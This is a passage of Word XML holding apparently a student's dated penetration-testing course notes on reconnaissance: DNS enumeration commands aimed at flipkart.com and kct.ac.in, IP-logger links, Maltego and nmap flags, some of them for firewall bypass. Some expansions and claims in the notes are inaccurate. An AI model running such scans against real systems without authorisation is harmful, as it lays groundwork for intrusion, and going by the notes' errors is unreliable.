    <w:p w14:paraId="000001F9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Email Tracker Pro - Used to find origin email server IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001FA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Smartwhois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> lookup - GUI of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoislookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000001FB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001FC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>H. SOCIAL MEDIA BASED INF GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001FD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>grabify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> | iploggers.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001FE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001FF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000200" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TO DO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000201" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">1. Mirror a single </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of a website using HTTRACK and host it in 000webhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000202" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. Download and install windows software based inf gathering tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000203" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">3. Install backtrack in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virutal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000204" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000205" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000206" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>G. OS BASED INF GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000207" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000208" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000209" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>20-09-2021, MONDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000020A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000020B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>G. OS BASED INF GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000020C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">BACKTRACK </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000020D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Username - root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000020E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">password - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000020F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000210" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>DNS Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000211" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>To enumerate subdomain information and further DNS related information about your target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000212" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000213" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>sendgrid.flipkart.com</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>18.10.1.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000214" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>sendgrid.flipkart.com</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>100.1.3.55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000215" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>sendgrid.flipkart.com</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>90.44.33.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000216" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>sendgrid.flipkart.com</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>98.34.22.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000217" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000218" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>DNSDICT6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000219" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#dnsdict6 -4 flipkart.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000021A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000021B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>DNSENUM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000021C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#./dnsenum.pl flipkart.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000021D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>it gives more info about name server and MX server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000021E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it checks if the target is vulnerable to zone transfer attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000021F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000220" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Zone transfer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000221" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>updation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of records from primary </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server to secondary </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server based on the request from secondary </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000222" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://pentest-tools.com/network-vulnerability-scanning/dns-zone-transfer-check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000223" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000224" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000225" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>DNSRECON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000226" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>#./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>dnsrecon.py -d flipkart.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000227" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000228" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>FIERCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000229" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#./fierce.pl -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> flipkart.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000022A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">performs around 1800 test to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enuermate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> needed information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000022B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000022C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>LBD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000022D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Load Balance Detector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000022E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>used to check if your target has a load balancer or not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000022F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000230" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Type of Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000231" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- DNS load Balancing (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DOne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by your ISP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000232" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Http Load Balancing (Configured by your org)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000233" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000234" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#./lbd.sh kct.ac.in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000235" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000236" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>MALTEGO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000237" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">GUI tool for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>infomration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gathering, forensics, investigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000238" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usedi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> n hacking, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, forensics and case analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000239" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>alos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> used for CDR | IPDR analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000023A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000023B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>CDR - Call Directory Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000023C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>IPDR- IP Directory report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000023D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000023E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000023F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TO DO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000240" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Download </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maltego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000241" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Register an account with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maltego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000242" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://www.maltego.com/ce-registration/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000243" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>marltego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in window (Free </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Maltego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000244" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Register </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maltego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with the username and pass which u have created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000245" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000246" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000247" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000248" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000249" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>21-09-2021, TUESDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000024A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000024B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>SCANNING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000024C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000024D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- To get additional information about our target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000024E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- To verify the info which we got from information gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000024F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000250" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TOOLS - NMAP, ZENMAP, ANGRY IP SCANNER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000251" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000252" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">NMAP - Network </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MAPper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000253" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000254" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">TYPES OF </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SCAN</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00000255" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- INTERNAL SCAN (Done inside a LAN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000256" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- EXTERNAL SCAN (Done outside a LAN - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> WAN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000257" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000258" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>COMMONLY USED COMMANDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000259" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> connect scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000025A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Stealth Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000025B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Version Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000025C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>UDP Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000025D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-v</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Verbrose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>mode(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Detailed output, It shows what is happening in the background)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000025E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-O</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>To find OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000025F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-A</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Aggressive Scan (OS + Services + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000260" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>To Fragment the packets (bypass firewall)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000261" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>To bypass firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000262" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-p</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>To mention a port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000263" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-T</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Timing scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000264" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>T1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Slow Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000265" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">T5 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Fast Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000266" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000267" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Scans like -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will scan only the default 1023 ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000268" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>0 - 1023 ports</w:t>
      </w:r>
    </w:p>
